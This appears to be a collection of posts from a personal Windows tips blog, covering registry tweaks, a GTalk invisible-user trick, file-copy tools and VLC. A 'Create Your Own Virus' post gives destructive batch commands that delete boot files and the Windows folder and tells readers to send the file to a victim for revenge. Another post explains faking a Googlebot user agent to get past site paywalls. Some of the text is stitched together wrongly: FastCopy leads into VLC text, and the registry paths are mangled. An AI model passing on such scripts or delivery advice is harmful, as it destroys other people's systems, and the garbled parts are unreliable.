I found a very interesting post recently on Sumesh's site while I was going through my subscriptions and I liked it so much that I decided to share it with you. So many times we come across sites that demand money to show your favorite content. This becomes quite disappointing for us as we have to spend a large amount to view our favorite content, but in some of these sites we can go through our favorite content without paying any money.
This can be done if we disguise ourself as a search bot because some of these sites allow the search bots to let in without any payment to increase the hits on their sites.They detect search bots by its User Agent attribute (for Firefox, it is Mozilla 5.0), and allow only bots in. Hence you can exploit this weakness of the sites that these sites have created themselves.

The user agent defines the browser, what OS you are using, and other small bits of information.information. Switching user agent in various browsers require seperate procedure, as follows: Visit DNSStuff to know your current user agent. Visiting it gave me the following report:

Browse pay sites on Firefox

Install User Agent Switcher Firefox extension and import this XML file by TechPatterns (do not click the link directly, instead right click and save) that has the required Googlebot/2.1. Once the file is loaded, configure your user agent to Googlebot 2.1
Pay sites on Internet Explorer

Change a registry entry, by opening Notepad, then copying the code below into it:

Windows Registry Editor Version 5.00 [HKEYLOCALMACHINESOFTWAREMicrosoftWindowsCurrentVersionInternet Settings5.0User Agent] @=”Googlebot/2.1″ “Compatible”=”+http://www.googlebot.com/bot.html”

Save as “uagent.reg” (with the quotes). Double click on it to load the setting. You could also go to the Registry directly, but my guess is that at least some of you are not comfortable working with the Registry.

To remove the hack, copy the following code into a Notepad window and save as “originaluagent.reg” (with the quotes) and double click it:

Windows Registry Editor Version 5.00 [HKEYLOCALMACHINESOFTWAREMicrosoftWindowsCurrentVersionInternet Settings5.0User Agent] @=”Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”

Finally, test whether the hack has taken effect by pointing your browser to DNSStuff website. The user agent should now be “Googlebot” according to DNSStuff.

Turn keyboard to Disco

Find who is invisible on Galk

Many people now days like remain on an invisible mode on GTalk.Even today when I was online this morning my friend was invisible on Gtalk. I wanted to chat with him but I didn't know he was online to.It was later in the dy that I came to know that he was online.
One of my friends once told me that there is a way to detect who is invisible on GTalk so today I searched For the trick and found it on Vishal's blog.

The trick goes like this:

1. Set the chat as off the record with target user.

2. Open the chat window of person, whom you want to check if Invisible or Offline. Go to Options and click "Go Off Record".

3. Now send message to that user

4. If you get the message that "The user is offline and can’t receive messages right now " that means the user is offline.

5. But if you didn’t get any message that means User is online and is in invisible mode..:)

recently I had been lookin for such a free utility that will help me convert my pdf files to word documents because I wasn't able to edit the files and I needed to change them for my own purpose, until I fell upon this utility on Keith's site which gave me this free utility to convert my pdfs to word docs.

Show Hidden Folders not Working

Often because of a virus attack the Show Hidden files and Folders option in Folder Options of Windows does not work creating a big problem for those who have to keep many files hidden on their computer. I faced this problem many a times and often I had to format my PC.But now you dont need to worry the problem can be solved by making simple registry changes as shown in the following methods:

Method 1:

Go to registry editor by running regedit in the run box.
Go to this key:
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Explorer\Advanced

In the right hand area, double click hidden and change the value to 1.

Now you’re all set to go. Check it in your tools menu if the changes have taken effect.

Method 2: (By Random Hajile)

1. Click “Start” -> “Run…” (or press Windows key + R)
2. Type “regedit” and click “Ok”.
3. Find the key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
Advanced\Folder\Hidden\SHOWALL
4. Look at the “CheckedValue” key… This should be a DWORD key. If it isn’t, delete the key.
5. Create a new key called “CheckedValue” as a DWORD (hexadecimal) with a value of 1.
6. The “Show hidden files & folders” check box should now work normally. Enjoy!

Method 3:

Many of you might be having multiple orkut accounts or gmail accounts and must be having difficulty in accessing them simultaneously in Mozilla Firefox.Here is the solution to this problem which has been tested in Vista and also in XP. Follow the following steps and you will be able to login in gmail and orkut with multiple accounts. Through this you will be able to make profiles in your firefox.

Step 1:Open system properties(by right clicking my computer), choose tab advanced, click to environment variables button. in system variables section, click new. type this information to each textbox.

Step 2:variable name: moz_no_remote (should be all small letter).variable value: 1

Step 3:open firefox icon's properties(from desktop and quick launch). add extension -p to command line(like "c:\program files\mozilla firefox\firefox.exe" -p). press ok.

When you will open firefox it will prompt for profile selection create a profile,open firefox login to orkut open once more use another profile login.

Help !! Unable to view Google Adsense

Hey help me....for the past few weeks I am quite worried and have tried all possible things from changing the
template to deleting posts to checking all possible solutions given by google. I am not able to view my google adsense, though my google search box is working absolutely fine.Google has not even blocked my url but still google text and image ads are not visible. Even in my other blog Kool Wallpaperz adsense is working perfectly fine and all the text and image ads are visible.

Copy/Delete Files Faster

I was fed up with the slow transfer rates even when I copied files from one partition to another on my hard-disk. Then my friend Jay suggested TeraCopy which does the same work faster. Later on I came across two more similar utilities called BurstCopy and FastCopy.

1. TeraCopy

TeraCopy is a free utility designed to copy/move files faster and more secure. TeraCopy can resume broken file transfers. TeraCopy skips bad files during copy and even shows the skipped files at the end of files transfer. Calculates files CRC checksum on the fly to speed up source and target files comparison. Seamless integration with Windows Explorer allows you to keep working with files as usual.

Version 1.1 adds the ability to create a copy of a folder by copying and pasting at the same location and a few minor bugfixes.

2. BurstCopy

BurstCopy gives you faster file transfer speeds in Windows. It gives the ability to Pause/Resume file transfers. It comes with 12 different languages and skin support.

BurstCopy comes as a shareware version, to use it fully you must register the software.

3. FastCopy

This is my favorite media player.I love the features of this player mainly the volume controls and the seek time feature.
For those who are unaware of VLC, let me give you a brief introduction.VLC media player is a free software media player written by the VideoLAN project.

VLC media player is a highly portable multimedia player for various audio and video formats (MPEG-1, MPEG-2, MPEG-4, DivX, mp3, ogg, ...) as well as DVDs, VCDs, and various streaming protocols. VLC can also be used as a server to stream in unicast or multicast in IPv4 or IPv6 on a high-bandwidth network.

VLC includes a large number of free decoding and encoding libraries; on the Windows platform, this greatly reduces the need for finding/calibrating proprietary plugins. Many of VLC’s codecs are provided by the libavcodec library from the FFmpeg project, but it uses mainly its own muxer and demuxers. It also gained distinction as the first player to support playback of encrypted DVDs on Linux by using the libdvdcss DVD decryption library.

Firstly, sorry for the lack of postings recently. I was a bit busy with a cricket tournament in my college. But I'll try to be regular from now on.
I recently got a windows 7 theme through Tech Yard and installed it on my PC. Believe me its really cool and I loved it.For this Cool theme I would definitely like to thank Avinash.

Create Your Own Virus

I always thought what is a virus and how is it made and will I ever be able to create one. Slowly I came to know about it and when I was going through a post on one of my favorite blogs I found out a technique to create a virus within 5 Minutes.
All you need to create these viruses are a simple notepad. Here is a way to create a virus that may crash your hard disk.

1) Open ur notepad n type the following.........
type del c:\boot.ini c:\del autoexec.batsave as .exe[save it as .exe file....n u can save it by any name]
create the notepad in c: drive...

2)Now, to test it, create a textfile called TEST.txt(empty)
in C:\Now in your notepad type "erase C:\TEST.txt" (without the quotes).
Then do "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone.
Now, the real work begins:Go to Notpad and
type erase C:\WINDOWS (or C:\LINUX if you have linux) and
save it again as findoutaname.cmd.
Now DON'T run the file or you'll lose your WINDOWS map.
So, that's the virus. Now to take revenge.
Send you file to your victim.
Once she/he opens it. Her/his WINDOWS/LINUX map is gone.
And have to install LINUX/WINDOWS again.
Simple explanation:Go to notepad, type erase C:\WINDOWS, save,
send to victim, once the victim opens it,
the map WINDOWS will be gone and have to install WINDOWS again...

CAUTION: This may crash your Hard disk....so don't try this on your computer...

Change the Browser Title

Have you ever thought of changing the title of your web browser? If not will you like to do that and give a browser your own name?
I did it and made it Microsoft Internet Explorer by Himanshu. Like my earlier post Watch Movies in MS Paint this tweak can be used to impress your friends.

This tweak Customize the Title of the Internet Explorer.

1. Click Start > Run > Type gpedit.msc
2. Click User Configuration > Windows Setting > Internet Explorer Maintenance > Browser User Interface
3. Double click on Browser Title
4. Click on Customize Title Bars
5. type in whatever you want
6. Click OK

Now you changed the title of your browser and you sure see what you wrote when you
open a New Widow.

Orkut blocked with proxy?

Hey is Orkut blocked in your college? Are you using a proxy? Are you still facing some problem? Is orkut still blocked?
Don't worry. I am not in a mood to take a viva. I was just asking all this stuff because I do face this problem. After a lot of search work I was able to find the solution to the problem of blocked orkut in the proxy also.So I thought Why not share the same with you.
Here is the solution to this problem.Just check out the address bar. You will find a main# there.Just remove it and now you can access your orkut account on the proxy. So take a chill pill !!
